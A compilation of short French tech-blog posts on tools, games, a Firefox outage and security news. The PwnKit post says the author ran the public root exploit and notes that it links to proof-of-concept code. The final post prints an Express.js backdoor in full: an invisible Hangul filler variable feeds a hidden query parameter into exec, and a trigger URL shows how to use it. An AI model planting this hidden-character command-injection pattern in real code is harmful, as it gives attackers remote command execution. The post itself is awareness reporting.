Cet outil peut donc être utilisé par des développeurs qui souhaitent débugger leur application, ou par des chercheurs en sécurité en quête de vulnérabilités. ZAP est fourni avec de nombreux plug-ins (il y a même une marketplace) et permet de faire au choix du scan automatique ou du scan manuel mieux calibré.

La plupart des fonctionnalités de ZAP peuvent ainsi être automatisées que ce soit via des Github Actions, la ligne de commande ou leur framework…etc. Une autre fonctionnalité nommée HUD pour Head Up Display (comme dans les bagnoles) permet de fournir un accès aux fonctions de ZAP directement depuis votre navigateur Firefox.

Bref, c’est vraiment un outil que je vous invite à tester pour évaluer la sécurité de vos sites ou tout simplement auditer vos clients.

À télécharger ici pour Linux, macOS et Windows.

J’sais pas pour vous, mais si vous êtes aussi bordélique que moi, vous avez sans doute, en plus de tout un tas de fichiers inutiles et oubliés, des répertoires totalement vides qui se baladent par centaine.

Alors ça ne prend pas vraiment de place, mais ça ne sert pas à grand-chose non plus d’avoir des dossiers vides sur son disque dur. Ça rajoute de la confusion.

Heureusement, il existe un outil open source pour Windows qui s’appelle RED pour Remove Empty Directories capable de rechercher et supprimer les répertoires vides récursivement sous un dossier de départ donné. Et évidemment, avant de supprimer quoi que ce soit, il vous laisse vérifier tous les répertoires vides qu’il a trouvés.

RED supporte différents niveaux de suppression (y compris l’envoi vers la corbeille) et peut également considérer les répertoires qui contiennent des fichiers vides comme étant des répertoires vides.

Bref, ça peut servir.

Et si vous êtes sous Linux, il y a une commande pour ça qui permet de trouver et supprimer les répertoires vides :

find /home/korben/ -type d -empty -delete

— Article rédigé par l’ami Remouk (DansTonChat) – Merci à lui —

Je suis joie, c’est le retour d’un jeu que j’ai particulièrement apprécié étant gamin : Windjammers ! Pas très connu car il était seulement sur borne d’arcade et Neo-Geo… Autant dire que ça coûtait un rein. Je remercie les émulateurs grâce auxquels j’ai passé un bon paquet d’heures, gratuitement, avec mes petits camarades sur ce jeu de freesbie. 🙂

Oui oui, un jeu de freesbie ! Imaginez un genre de Pong (1 contre 1) sur-vitaminé ! Il faut envoyer le disque dans les cages de l’adversaire. Il y a très peu de « coups » disponibles, c’est vraiment simple à prendre en main, mais assez difficile à maîtriser ; la courbe de progression est immense.

28 ans plus tard (ça pourrait être le nom d’un film de Danny Boyle avec des zombies), que propose cette toute première suite ? Pas mal de petites choses mais rien qui ne va casser le plaisir d’origine : les développeurs français de chez Dotemu ont été jusqu’à reprendre le code du premier jeu pour reproduire le gameplay aux petits oignons.

Sauf que maintenant, c’est en HD avec des graphismes super sympa dessinés à la main, des musiques excellentes : sortez les lunettes de soleil pour profiter de l’ambiance. 😎

À cela s’ajoutent quelques mouvements bien trouvés, de nouveaux personnages, des niveaux plus variés, bref, de quoi renouveler l’expérience sans jamais la trahir. Sans oublier le mode en ligne, assez sommaire mais efficace. À l’image du jeu d’ailleurs : on va à l’essentiel mais le fun est là !

Attention quand même, le challenge est difficile (préparez-vous à prendre quelques raclées), cependant, il y a toujours cette envie d’en lancer une petite dernière. Pari réussi !

Windjammers 2 est disponible sur toutes les plate-formes du moment : PC (Steam), Nintendo Switch, les différentes XBox (One, Series S/X) et Playstation (5 et 4) ! Il est même disponible dans l’offre GamePass de chez Microsoft. 😉

Hello,

Janvier s’achève lentement mais sûrement. J’espère que vous êtes tous bien remis des fêtes et que vous avez kiffé ce mois de la frangipane et de l’absence d’alcool.

Heureusement, il me reste 3 jours pour vous souhaiter une bonne année. Donc bonne année.

Que cette année placée sous le signe de l’inflation et d’une élection présidentielle chiante et hargneuse vous réussisse. Que vos wallets Bitcoin et vos NFTs soient bénis et que la volonté de votre employeur soit faite, sur Twitter comme sur Pornhub.

Évidemment, la santé… Tous anti Covid oué oué, multi-dosé jusqu’à l’OS pour tenter enfin de retrouver les jours heureux. Pleins de légumes dans le potager, de la 5G dans vos smartphones et évidemment beaucoup d’amour dans les metaverses.

Pour ma part, 2021 a été l’occasion de renforcer une bonne fois pour toutes mon syndrome de la cabane tout en apprenant le bricolage et l’exploitation forestière. J’ai aussi repris le sport à la maison.

N’oubliez pas, si vous habitez Paris, c’est le moment de déménager. Si vous êtes exploité par votre employeur, c’est le moment de changer de taf et si votre conjoint vous martyrise, c’est le moment d’embrasser la vanlife…seul évidemment.

Sur ce, bisous. Merci à tous ceux qui me soutiennent sur Patreon, mais également sur Twitch et également mes fidèles annonceurs publicitaires que j’embrasse !

Oyez, oyez jeunes et moins linuxiens ! Sachez-le, il y a sur votre Linux une faille de 12 ans d’âge qui permet à n’importe quel utilisateur lambda sans aucun droit, de devenir root.

Cette vulnérabilité se situe dans le composant pkexec de Polkit. Polkit est un framework qui gère les interactions entre les process avec privilèges et sans privilèges. À titre d’exemple, pkexec permet à un utilisateur de lancer des commandes en tant qu’un autre utilisateur, un peu comme avec sudo.

Référencée sous le doux nom de CVE-2021-4034 alias PwnKit, cette vulnérabilité fonctionne plutôt bien. Un proof of concept en C est même dispo ici. Et un autre en Python également téléchargeable là.

Je viens de le tester sur un Linux Mint et me voilà root.

Évidemment, l’heure est au patch, donc vous pouvez soit patcher directement Pkexec, soit mettre à jour votre système Linux. Debian, Ubuntu, Mint et dérivés ainsi que Red Hat ont déjà sorti les patchs. Mais si vous êtes sur un système un peu à la traine, vous pouvez en attendant utiliser cette commande pour neutraliser l’exploitation de pkexec :

chmod 0755 /usr/bin/pkexec

Également, si vous avez un doute concernant votre serveur et que vous voulez vérifier les logs afin d’être certain que la vuln n’a pas été exploitée, cherchez les chaines suivantes dedans :

The value for the SHELL variable was not found the /etc/shells file

The value for environment variable […] contains suspicious content.

Vous trouverez tous les détails techniques de cette vuln chez Qualys.

Bon courage !

Source

Je ne sais pas si vous jouez un peu avec la blockchain, mais si c’est le cas, vous connaissez forcément Etherscan, le site d’exploration de la blockchain Ethereum. Dessus on peut suivre toutes les transactions qui ont lieu et ainsi voir que 0x…. a envoyé 30 ETH à 0x… ou encore que 0x… a acheté un NFT de BAYC (Mais si, les singes tellement blindés de thunes qu’ils s’ennuient à mourir) à un autre 0x…

Bref, jusqu’à présent, tout le monde peut voir qui échange avec qui, mais jusqu’à présent, on ne pouvait pas vraiment communiquer. Mais l’équipe à l’origine d’Etherscan s’est dit que ce serait une bonne idée de créer un chat utilisant la blockchain.

Baptisé Blockscan Chat, c’est un chat off-chain qui utilise sa propre infra, et qui permet à des utilisateurs d’aller discuter avec d’autres utilisateurs en connaissant uniquement leur adresse de portefeuille Ethereum. Le service offre tout ce qu’un service de messagerie basique peut proposer comme la possibilité de bloquer les relous et recevoir une notif lorsqu’un message arrive ou de recevoir les messages sur différents appareils.

Alors d’un côté, je trouve ça cool, notamment pour les possesseurs de NFTs qui souhaitent négocier entre eux sans forcément divulguer leur identité ou pour les chercheurs en sécurité qui souhaitent faire part de leurs découvertes à un porteur de projet sans pour autant se mettre en danger. Puis ça permet d’éviter de passer par des plateformes centralisées comme Opensea ou ce genre de trucs.

Mais je trouve ça également incroyablement risqué, car il suffit d’un mauvais clic sur un lien malicieux ou d’une faille dans leur système pour que la personne qui reçoit le message tombe dans une arnaque ou divulgue son identité.

Bref, vous l’aurez compris, je suis assez mitigé sur Blockscan. Ça va être incroyablement pratique et en même temps c’est un vecteur d’attaque supplémentaire… Donc comme d’hab, c’est bien de l’utiliser, mais avec une extrême prudence.

Faites gaffe à vous.

Amis développeurs, saviez-vous que Microsoft proposait sur son site une machine virtuelle Windows 11 Entreprise qui vous est entièrement destinée ?

Conçue pour vous permettre de créer des applications Windows rapidement avec les derniers outils Microsoft, elle vous intègre en plus de Windows 11 avec le mode développeur activé, le SDK de Windows 10, une version récente de Visual Studio avec avec UWP (plateforme Windows universelle), le bureau .NET et Azure activés ainsi que l’extension Windows Template Studio.

Visual Studio Code est également de la partie et le sous-système pour Linux est également présent avec Ubuntu installé par défaut. Sans oublier le terminal évidemment.

Cette machine virtuelle d’environ 20 Go est disponible pour VMWare, Hyper-V, Virtualbox ou encore Parallels et c’est gratuit.

À découvrir ici.

Fortement inspiré de Scratch, Le site Make & Code de Microsoft permet à tous ceux qui le souhaitent et notamment aux enfants, de découvrir la programmation.

Le site propose ainsi des jeux mais également des vidéos et des tutoriels qui utilisent leur plateforme MakeCode permet de concevoir principalement des jeux avec des briques.

Une fois que vous serez à l’aise avec tous ces blocs, vous pourrez passez ensuite directement en Python ou en Javascript et même mettre votre code sur du vrai hardware comme le Meowbit ou d’autres machines de ce style. Il y a même des modules pour apprendre à réaliser des mods pour Minecraft. Ils sont forts 🙂

C’est vraiment très cool pour les débutants qui veulent apprendre à créer des jeux ou pour les enfants et les parents qui veulent passer un peu de temps ensemble sur une passion ou une découverte commune.

Make & Code est disponible ici.

En novembre dernier, le CNES a rendu public un outil baptisé CARS pour Chaîne Automatique de Restitution Stéréoscopique. Derrière ce nom amusant, se trouve une technologie capable à partir de 2 images satellites d’un même lieu, prises depuis 2 points différents, de générer une vue 3D, c’est-à-dire avec des volumes.

Cette vue 3D est appelée un modèle numérique de surface (Digital Surface Models) ou encore DSM et permet de passer de vues satellites comme ça :

À un modèle 3D comme ceci :

Pouvoir appliquer ce genre de volume à des photos satellites permet par exemple de différencier une pelouse d’une forêt, de suivre l’apparition de nouveaux bâtiments en ville, de mesurer la hauteur de la végétation ou encore de surveiller le volume de minerais extraits de carrières à ciel ouvert.

Bref, beaucoup d’usage possible qui permet d’ajouter à de l’analyse de photos satellites, une variable de volume qui apporte énormément à la compréhension de l’image de surface.

L’outil fonctionne avec Docker et vous trouverez la doc ici.

Si vous êtes un passionné de cybersécurité et que vous cherchez à apprendre de nouvelles choses, avez-vous déjà pensé à suivre des streams en live de hackers sur Twitch ?

Ils ne sont pas si nombreux et ils sont tous référencés sur cette page. Tous ceux qui n’ont pas streamés depuis +14 jours sont retirés de la liste, ainsi vous n’aurez que du frais.

Les gens en train de streamer à l’heure où j’écris ces lignes sont également marqués comme « En ligne » avec une pastille verte et un lien vers leur chaine YouTube est également fourni.

Et si vous êtes vous-même streamer cybersécu, n’oubliez pas de vous rajouter dans le fichier streamers.csv avec une pull request sur le projet.

Vous avez besoin d’illustrer un document ou un article sur votre site ? Vous cherchez des icônes et des illustrations pour votre application ?

Ne cherchez plus !

Grâce au site Reshot proposé par Envato, vous aurez accès gratuitement et sans aucun besoin de licence à plus de 40 000 icônes, 25 000 photos et 1500 illustrations vectorielles en tous genres.

Dans la même ligne que Pexels et bien d’autres, cela vous permettra d’illustrer à peu près tout ce que vous voudrez sans avoir besoin de débourser un centime.

Et les photos sont vraiment de bonne qualité. De plus, les thèmes sont suffisamment variés pour que vous y trouviez votre compte. D’ailleurs toute la liste des tags est ici.

Si vous avez besoin de faire un petit schéma propre et clair pour illustrer un article ou de la documentation dans le cadre d’un projet de développement, j’ai un super outil libre pour vous.

Cela s’appelle tldraw et ça permet de dessiner des formes géométriques de bases, de les lier, de mettre un peu de texte et surtout d’exporter ensuite tout ça au format SVG ou JSON.

Voici un rendu SVG de la chose :

L’interface est vraiment bien pensée, surtout qu’en plus de l’interface web que vous trouverez ici, il existe également des plugins pour les éditeurs de code comme Visual Studio ou des traitements de texte comme Taio.

Et si vous êtes curieux de voir ce que réserve la suite, la prochaine version de tldraw en cours de dev est disponible ici.

Et tldraw plaira également aux développeurs puisque vous pourrez le manipuler à l’aide de son API directement depuis la console de dev du navigateur comme vous pouvez le voir sur ces tweets.

Vraiment génial ! Un service qui vient rejoindre ma boite à outils !

Google Maps, c’est super génial à utiliser, mais pas forcément à imprimer. Heureusement, il existe un site qui s’appelle PDF Map Maker qui va vous permettre de générer un PDF prêt à imprimer à partir de Google Maps.

Vous choisissez l’emplacement, le format de la page (portrait, paysage…etc.), le fond de carte dont vous avez besoin (trafic routier, satellite, plan…etc.), mais également le niveau de zoom, le style 3D ou non, la rotation et surtout un pitch pour avoir une carte sous un angle diffèrent de celui de la vue supérieure du satellite.

Une fois que vous avez ce que vous voulez, vous cliquez sur Download Map et vous récupérez un beau PDF que vous pourrez ensuite imprimer ou envoyer.

Ce qui est vraiment cool avec ce service, c’est que vous pouvez y ajouter vos propres données géographiques en les important au format JSON. Pour générer ce genre de fichiers, rendez-vous sur Vector.

Pratique pour fournir une carte à des invités, décider de l’emplacement de vos pièges à loups ou organiser une chasse au trésor dans les rues de votre ville.

Vous voyez cette fonctionnalité sur Zoom ou Google Meet qui permet de vous détourer du fond pour ensuite afficher ce que vous voulez derrière, même sans fond vert ?

Et bien le plugin Virtual Background permet de faire la même chose sous OBS Windows 64 bit (uniquement).

Fond virtuel oblige, le détourage sera bien sûr un peu dégueu, mais vous n’aurez pas à investir dans un fond vert.

Ainsi, vous pourrez passer de ça :

À ça :

Elle n’est pas belle la vie ?

Par contre, attention, il peut y avoir des glitchs donc si VRAIMENT vous ne voulez pas que votre public puisse voir ce qu’il y a derrière vous, il ne vaudrait mieux pas utiliser ce plugin et investir dans un vrai fond vert. Je vous recommande celui-ci que j’utilise et qui est très bien.

Je vous parlais de caméra de chasse hier mais si vous avez des caméras à la maison, vous vous êtes sûrement rendu compte que la plupart étaient limitées par l’usage de l’application cliente fournie avec. Si vous utilisez des outils pour agréger des flux vidéos, vous l’avez dans l’os, car ces caméras ne propose pas en général de flux RTSP.

C’est naze.

Heureusement, pour les caméras Yi de la marque Xiaomi, il y a moyen de contourner cette limitation.

Comment ?

Et bien avec ce firmware alternatif nommé Yi Hack v5 qui permet de flasher les caméras utilisant le chipset Hi3518ev200 pour leur permettre d’avoir du RTSP, de la détection de mouvement MQTT, un webserveur / SSH / Telnet / FTP intégré et accessible et surtout la possibilité de modifier certains paramètres de la caméra :

• caméra on/off
• mode économie
• sensibilité de détection
• voyant d’état voyant
• infrarouge
• rotation de l’image

Voici pour votre information la liste des caméras supportées pour ce hack :

• Yi 1080p Home 48US – confirmé
• Yi 1080p Home 20US – confirmé
• Yi Home 17CN / 27US / 47US – confirmé
• Yi Dome – confirmé, mais de gros problèmes de performance avec Snapshot et ONVIF surchargent le CPU.
• Yi 1080p Dome – confirmé
• Yi 1080p Cloud Dome – confirmé
• Yi 1080p Outdoor – confirmé

Évidemment comme toujours avec ce genre de firmware, il existe un risque de bricker votre appareil, mais rassurez-vous dans la plupart des cas c’est rattrapable. Je vous invite quand même à lire sérieusement la documentation pour savoir où vous mettez les pieds.

J’ai acheté une caméra de chasse y’a pas longtemps et j’ai vachement été déçu. Le rendu est pas ouf et elle ne se déclenche pas forcément lorsqu’il y a des choses intéressantes.

Heureusement, j’ai découvert qu’on pouvait faire mieux avec un simple Raspberry Pi et le projet Sentry Picam.

Sentry-Picam est un soft pour Raspberry Pi Zero W qui permet de le transformer en caméra dédiée à la faune sauvage. Ainsi, vous pourrez capturer en vidéo H.264 1080p / 30fps le moindre mouvement animalier ou humain.

Vous pourrez ensuite revoir les clips vidéos via une interface web et ainsi identifier les moments de passage les plus actifs de la journée. Tous les enregistrements sont conservés sur la carte mémoire tant que l’espace disponible est suffisant.

Pour fonctionner, la détection de mouvement dans Sentry-Picam utilise des vecteurs fournis par le pipeline vidéo de RaspiVid, permettant une suppression performante et efficace du bruit qu’on peut retrouver dans ce genre de vidéo filmée en pleine nature avec des conditions de luminosité qui évoluent vite.

Et si vous êtes plutôt amateur de directs, grâce à Broadway et RaspiVid, le Pi Zero W peut également diffuser des vidéos en live vers plusieurs appareils avec un délai d’environ 300 millisecondes sur une connexion wifi classique.

Si ce projet vous intéresse, il est sur Github.

Si vous êtes sous Linux et que vous utilisez un touchpad, vous vous sentez peut-être un peu limité dans vos mouvements. Heureusement, grâce à l’application Touchégg, vous allez pouvoir vous la jouer comme sous macOS et transformer vos gestes gracieux en actions sur votre bureau Linux.

Que ce soit sur un pavé tactile (touchpad) ou sur un écran tactile, vous pourrez par exemple configurer Touchégg pour agrandir une fenêtre en glissant vers le haut 3 de vos doigts ou encore passer au bureau suivant en glissant vers la gauche 4 doigts.

Touchégg s’installe sous Ubuntu, Debian, Fedora, CentOS, Red Hat, Arch, Manjaro ou encore Alpine Linux.

Pour Ubuntu, il suffit d’ajouter le dépôt :

sudo add-apt-repository ppa:touchegg/stable 
sudo apt update 
sudo apt install touchegg

Évidemment, ce ne sont que des exemples et tout est parfaitement configurable, le plus simplement du monde et Touchégg peut se comporter différemment en fonction des applications.

Bref, un super logiciel qui changera votre vie si vous utilisez un Touchpad. Perso, je préfère quand même une bonne vieille souris verticale.

Il arrive parfois qu’on meurt. C’est con mais c’est comme ça. Et on se retrouve bien embêté surtout lorsque le défunt possède un compte Instagram.

Si vous ne vous occupez pas de son compte, celui-ci laissé à l’abandon sera sûrement supprimé ou réattribué un jour.

Heureusement, pour remédier à cela, chez Instagram, ils ont une procédure qui s’appelle la « Mémorialisation ». C’est à dire pouvoir transformer un compte Instagram en compte commémoratif pour la personne disparue.

Cela permet de se souvenir de la vie d’une personne après son décès. L’idée de ce compte commémoratif est donc de figer le compte Instagram. Ainsi, plus personne ne pourra s’y connecter et le compte sera marqué comme « Remembering » à côté du nom de la personne. Tout le contenu restera alors accessible mais ne pourra plus jamais être modifié.

Pour toujours… enfin, jusqu’à la disparition d’Instagram quoi.

Si vous avez besoin de suivre cette procédure, vous devrez remplir ce formulaire et fournir une preuve du décès.

Je fais tout le temps des tas de captures écrans de trucs dont je veux me souvenir. Mais évidemment, retrouver une capture écran parmi des centaines de captures écrans, ce n’est pas simple. C’est même parfois mission impossible.

Toutefois, Mozilla semble avoir réfléchit fortement à la question et propose Firefox ScreenshotGo, une application Android qui vous permet de faire des captures écrans mais surtout de les organiser facilement dans des collections. L’intérêt de ScreenshotGo c’est qu’il indexe également le texte présent sur les images pour pouvoir retrouver plus facilement vos captures à l’aide du moteur de recherche.

C’est donc un super outil pour les gens qui prennent beaucoup de captures écran. C’est disponible uniquement sur le Play Store Indonésien mais vous pouvez quand même l’installer en passant par ce lien.

— En partenariat avec Sogilis —

Hello,

Alors je ne sais pas si vous vous souvenez, mais en fin d’année dernière j’ai partagé une enquête menée par Sogilis qui posait une question très intéressante : Que veulent les développeurs ?

L’idée c’était de comprendre quelles étaient les motivations des développeurs de rejoindre une entreprise. On parle en effet, beaucoup du salaire, parfois du « projet », mais il n’y a pas que ça.

Aujourd’hui, nous avons enfin les réponses puisque vous êtes exactement 1224 développeurs et développeuses à avoir répondu à l’enquête. Les femmes sont légèrement sous-représentées par rapport à la réalité, ou alors elles n’ont pas souhaité répondre à la question (environ 20% n’ont pas répondu à cette question).

La majorité d’entre vous travaille actuellement chez des éditeurs de logiciels ainsi que des ESN (entreprises de service numérique) et des agences web.

Vous avez en moyenne 33,7 ans (plus jeune que moi dites donc :-))

Et sans surprise, vous êtes localisés majoritairement à Paris et région parisienne. 56% des personnes qui ont répondu travaillent dans les 10 départements suivants :

• Paris
• Rhône
• Hauts-de-Seine
• Isère
• Loire-Atlantique
• Haute-Garonne
• Nord
• Ille-et-Vilaine
• Gironde
• Bouches-du-Rhône

Bon, ça, c’était pour vous décrire… Maintenant, passons dans le vif du sujet, à savoir ce que vous voulez vraiment. Au risque de vous surprendre, le salaire n’arrive pas dans le top 10 de vos critères de choix avant de rejoindre une entreprise. C’est fou. En effet, vous placez le télétravail en premier suivi par un fort besoin d’avoir une bonne ambiance au travail et la liberté sur la pose de vos congés.

D’ailleurs, les aspects purement matériels comme le salaire, le choix du matériel ou la localisation proche des transports en commun ne sont pas votre priorité. Non, ce que vous voulez c’est surtout un job dans lequel vous pouvez exprimer votre potentiel sur des projets qui ont du sens, dans une bonne ambiance et de la souplesse sur vos horaires. Bref, la qualité de vie avant la paye.

Quand on vous questionne sur votre emploi actuel, vous en êtes moyennement satisfait.

Concernant votre salaire, que vous débutiez votre carrière ou que vous ayez déjà des dizaines d’années d’expérience, vous pensez que votre travail mérite plus. En gris, c’est votre salaire actuel par année d’expérience et en rouge, c’est le salaire que vous souhaiteriez. L’augmentation est à l’évidence plus rapide en début de carrière et ensuite, ça a tendance à s’aplatir. Il n’y a pas beaucoup d’écart entre le salaire de quelqu’un qui a +10 ans d’expérience et celui de quelqu’un qui a +20 ans d’expérience.

Les salaires en région sont également beaucoup plus bas qu’en Île-de-France.

Vous le savez, les entreprises recrutent énormément de développeurs, et comme la plupart sont déjà en poste, c’est difficile de leur faire changer d’entreprise. Vous êtes d’ailleurs 39% à être suffisamment satisfaits de votre emploi actuel pour ne pas vouloir en changer. Concernant ceux qui veulent changer de job, vous êtes surtout freiné par la peur d’avoir les mêmes soucis ailleurs, ou par attachement à votre entreprise. Vous savez également que changer d’entreprise ça demande un peu de boulot et vous avez la flemme… Oui oui…

Alors pour vous motiver, qu’est-ce qui vous déciderait à changer d’entreprise en ce moment ?

Étrangement, un meilleur salaire est ce qui vient en premier. Pourtant, cela n’est pas dans le top 10 de vos critères de choix. On peut sûrement expliquer cela de plusieurs manières, mais c’est certain que le salaire est encore le critère numéro 1 pour vous motiver à changer d’entreprise. Viennent ensuite l’environnement et un fort besoin de temps libre. Vous êtes également nombreux à vouloir plus de sens à votre travail et à chercher un poste 100% en télétravail.

Concernant les ESN, Sogilis souhaitait connaître vos préjugés sur ces entreprises de service numérique. Et sans surprise, on retrouve les grands clichés suivants :

Même si ces clichés sont malheureusement vérifiables dans certaines grosses entreprises, Sogilis a toujours privilégié l’humain. Dans cette ESN régionale à taille humaine localisée à Grenoble et à Lyon, chacun décidait déjà de son rythme de télétravail, même avant le COVID. La transparence, la confiance, l’autonomie, la responsabilité et l’amélioration continue sont d’ailleurs des valeurs fortes de Sogilis.

Au niveau de la pose des congés, chacun s’organise avec son équipe et son client et le dirigeant valide systématiquement les demandes de congés (même deux jours avant). Évidemment, pour leurs clients, ils visent un travail de qualité et chacun peut démarrer sa journée quand il veut et finir quand il veut tant que cela ne nuit pas au projet.

Concernant le cliché des avant-ventes qui sont réalisées uniquement par des commerciaux déconnectés de la technique, c’est également faux chez Sogilis qui mobile toujours un représentant de chaque métier (dev, ux, ui) en avant-vente, avec le commercial (qui d’ailleurs ne touche pas de prime. Ils doivent simplement trouver des missions dans la cible qui répondent aux envies de développeurs). Ainsi, c’est l’équipe technique qui propose une démarche.

Leur démarche est donc clairement basée sur l’écoute et l’épanouissement des équipes. À tout moment, chacun peut demander à changer de mission, se tester sur un nouveau rôle dans un projet, ou encore se former.

Alors bien sûr, vous n’êtes pas obligé de les croire, mais si vous en avez l’occasion, je vous invite à échanger avec des employés de Sogilis. Vous serez surpris.

Voilà, on sait enfin ce que veulent les développeurs. Rien de vraiment bien compliqué. Une bonne ambiance, du télétravail, des projets sains et enrichissants, de la liberté, de l’autonomie…etc. Bref, un emploi qui reste un plaisir et pas une contrainte. Un endroit où ils sont considérés et écoutés et où ils peuvent évoluer et faire de leur mieux. Je ne sais pas vous, mais je trouve ça plutôt sain comme résultat d’enquête.

Reste maintenant aux entreprises qui recrutent à évoluer suffisamment pour permettre justement à chacun de vivre mieux au travail et non plus de travailler pour vivre uniquement en dehors de l’entreprise.

Une panne semble actuellement toucher tous les utilisateurs de Firefox. Impossible d’accèder au moindre site web.

Le problème semble lié au support du HTTP3 dans le navigateur. On ne sait pas encore exactement ce qu’a foutu Mozilla mais si vous rencontrez actuellement le problème, voici un moyen de le résoudre.

Edit2 : Le souci semble avoir été résolu par Mozilla.

Edit1 : Un ticket viens d’être créé sur sur Bugzilla. Il semblerait que ce soit lié à la collecte de données. Pour la désactiver :

Tapez dans la barre d’URL :

about:preferences

ou allez dans les préférences -> Vie privée et sécurité et désactivez la collecte de données :

Sinon, autre moyen de contournement :

Tapez dans la barre d’URL

about:config

Cliquez sur le bouton bleu d’avertissement, puis recherchez la clé

network.http.http3.enabled

Passez la à « False » en double cliquant dessus.

Ensuite relancez votre navigateur.

Bon courage. J’éditerai cet article lorsqu’on pourra tous réactiver HTTP3.

Vous connaissez forcement Notion puisque je vous en parle depuis 2 ans. J’ai même fait une vidéo qui vous explique comme l’utiliser.

Bon c’est cool mais vous le savez, Notion reste un logiciel propriétaire. Si vous ne jurez que par le logiciel libre, sachez qu’il existe une alternative libre et open source à Notion baptisée AppFlowy.

Dispo sous Windows, Linux et macOS, AppFlowy est pour le moment encore très jeune donc vous ne vous y retrouverez pas si vous êtes un utilisateur avancé de Notion. Toutefois, pour une utilisation basique, c’est tout pareil et vous pourrez designer votre documentation, vos tableaux kanban, vos grilles de contenus…etc.

Évidemment, l’intérêt avec AppFlowy, c’est que vous restez maître à 100% de vos données et que vous pouvez customiser comme bon vous semble ce clone de Notion pour en faire une tout autre application.

J’ai depuis toujours vachement de mal à me concentrer sur un truc précis. Heureusement, même si la musique ne m’aide pas vraiment, les bruits blancs et autres sons de la nature, peuvent me faciliter la tâche.

Que ce soit pour mettre une ambiance relaxante ou m’aider à me concentrer, la pluie qui tombe, le bruit des vagues, les oiseaux qui chantent ou tout simplement le vent font parfaitement l’affaire.

Avec le site shhh noise, il est possible de se créer une petite ambiance relax comme ça en cliquant simplement sur les sons que vous aimez et de régler leur volume.

Et voilà, vous êtes à la plage en plein mois de janvier. Quel bonheur !

Vous pouvez évidemment sauvegarder votre paramétrage et le partager avec vos amis ou collègues via une simple URL.

Merci à Laurent pour le partage !

Que vous soyez sous Linux ou Windows, il est parfaitement possible de faire tourner macOS grâce à Docker.

Comment ?

Et bien grâce à ce projet de la boite de sécu Sick Codes qui vous fournit tout… Les images Docker pour Monterey, Big Sur, Catalina…etc ainsi que les lignes de commande qui vont bien pour lancer ces images.

Une fois Docker installé, vous pouvez récupérer les images ici sur le hub de docker puis par exemple lancer la commande suivante pour lancer Monterey :

docker run -it \
--device /dev/kvm \
-p 50922:10022 \
-v /tmp/.X11-unix:/tmp/.X11-unix \
-e "DISPLAY=${DISPLAY:-:0.0}" \
-e GENERATE_UNIQUE=true \
-e MASTER_PLIST_URL='https://raw.githubusercontent.com/sickcodes/osx-serial-generator/master/config-custom.plist' \
sickcodes/docker-osx:monterey

# docker build -t docker-osx --build-arg SHORTNAME=monterey .

Les performances sont excellentes, et vous pourrez l’utiliser pour faire de la recherche en cybersécurité (la connexion avec l’iPhone fonctionnera ainsi que iMessage, le forwarding X11 ou encore le partage de dossiers) ou tout simplement tester un outil ou deux.

Prévoyez quand même +20 GB de disque dur pour stocker la bête.

Sick Codes a également mis en ligne un optimiseur de macOS pour accélérer un peu l’exécution de celui-ci (à utiliser avec prudence)

J’ai beaucoup aimé la série Loki sur Disney+ et si vous ne l’avez pas vu, je vous la recommande.

Très cool ce petit sceptre. Ça m’aurait bien servi ce weekend pour désintégrer quelques relous. Mais en attendant, je vais me consoler avec ce projet de sceptre imprimé en 3D qui détecte les mouvements et fait du son comme dans le film. Ainsi, si vous bossez sur un cosplay de Loki ou d’un des personnages de la série, c’est forcément le truc à avoir.

Le tuto a été mis au point par les frères Ruiz, et toutes les étapes sont décrites ici, avec également le code Python qui va bien. Le montage utilise un Feather M4 et PropMaker FeatherWing programmé avec le langage CircuitPython.

Je trouve le rendu super propre ! On dirait un vrai, même si malheureusement, on ne peut désintégrer personne avec celui-là. Cependant, je suis sûr qu’on peut y ajouter un petit taser.

Vous vous passionnez pour les images satellites et vous aimeriez bien faire un timelapse d’une zone particulière de la planète pour montrer son évolution ?

Et bien avec Streamlit c’est possible. Le principe est simple. Vous sélectionnez une zone sur la carte, vous exportez cette zone dans un fichier json. Vous réimportez ensuite ce json, vous choisissez une collection d’images satellites et vous cliquez sur le bouton « Submit ».

Et voilà, vous aurez un joli GIF animé ou MP4 à télécharger. Je vous laisse regarder les vidéos pour voir ce que ça donne.

Des chercheurs du cabinet de consultig Certitude, ont mis au point une backdoor (porte dérobée) qui ne peut pas être détectée, car elle utilise un caractère Unicode invisible. La technique n’est pas nouvelle, mais c’est une bonne piqûre de rappel (c’est la mode en ce moment, les rappels).

Celui-ci peut ainsi être interprété comme une variable dans un bout de code JavaScript. En effet, à partir de la version 2015 d’ECMAScript, tous les caractères Unicode ayant la propriété « ID_Start » peuvent être utilisés dans des variables ou des constantes.

Ainsi, le caractère « ㅤ » (0x3164 en hexadécimal) qu’on appelle également « HANGUL FILLER » est considéré comme une lettre et possède cette propriété « ID_Start ».

Il ne reste plus qu’à l’utiliser dans du code JavaScript en échappant le caractère comme ceci :

const { timeout,\u3164} = req.query;

Ainsi, dans ce code, on ne passe pas uniquement 1 paramètre « timeout » dans la requête, mais 2 paramètres : timeout et notre caractère Unicode invisible.

Ainsi, quand on observe ce code :

const express = require('express');
const util = require('util');
const exec = util.promisify(require('child_process').exec);

const app = express();

app.get('/network_health', async (req, res) => {
    const { timeout,ㅤ} = req.query;
    const checkCommands = [
        'ping -c 1 google.com',
        'curl -s http://example.com/',ㅤ
    ];

    try {
        await Promise.all(checkCommands.map(cmd => 
                cmd && exec(cmd, { timeout: +timeout || 5_000 })));
        res.status(200);
        res.send('ok');
    } catch(e) {
        res.status(500);
        res.send('failed');
    }
});

app.listen(8080);

On peut voir que le caractère est appelé à 2 endroits. Je les ai mis en gras. Sur Visual Studio c’est un peu plus voyant, car ces caractères forment des carrés jaunes (lignes 8 et 11).

Chaque élément du tableau, les commandes en dur et le paramètre fourni par l’utilisateur du script sont ensuite transmis à la fonction exec qui exécute les commandes au niveau du système d’exploitation.

Grâce à notre caractère invisible, on peut lui passer une commande bonus comme ceci en ajoutant le paramètre 0x3164 URL-encoded, ce qui donne %E3%85%A4 :

http://host:8080/network_health?%E3%85%A4=METTEZ-ICI-NIMPORTE-QUELLE-COMMANDE

Et voilà, la commande supplémentaire sera alors exécutée sur le système.

Ainsi, la détection de ce genre de code invisible dépendra vraiment de l’éditeur utilisé pour afficher le code. Comme vous avez pu le voir, sous Visual Studio c’est visible, mais subtil.

